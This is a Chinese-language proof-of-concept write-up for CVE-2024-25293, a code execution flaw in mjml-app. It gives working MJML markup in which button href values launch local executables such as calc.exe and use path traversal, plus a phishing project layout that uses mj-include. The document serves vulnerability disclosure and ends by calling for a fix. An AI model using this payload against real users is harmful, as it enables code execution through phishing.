CVE-2024-25293 漏洞的概念验证(PoC)。
mjml-app v3.0.4 和 3.1.0-beta 被发现存在远程代码执行(RCE)漏洞。
此仓库中包含一个易受攻击的示例应用程序及其概念验证(POC)利用程序。

步骤 1)攻击者创建一个带有 'href' 标签的 'mj-button',并且
<mjml>
<mj-body>
<mj-section>
<mj-column>
<mj-button background-color="#f45e43" color="white" href="C:\Users\EQST\Desktop\jruru\..\jruru_hacked.txt"> jruru </mj-button>
<mj-button background-color="#f45e43" color="white" href="C:Windows/System32/calc.exe"> Code Execution </mj-button>
</mj-column>
</mj-section>
</mj-body>
</mjml>

步骤 2)攻击者使用以下代码创建主钓鱼项目。
<!-- header.mjml -->
<mj-section>
<mj-column>
<mj-text>This is a demo jruru</mj-text>
</mj-column>
</mj-section>
<!-- main.mjml -->
<mj-include path="./index.mjml" />

步骤 3)受害者打开共享项目并点击按钮,触发载荷的执行(例如 calc、notepad)

在应用内通过 href 标签运行 exe 文件存在风险,结合路径遍历运行文件更是一个安全隐患。这使得攻击者可以创建并部署钓鱼项目来执行本地文件。因此,必须修改此功能以防止此类执行。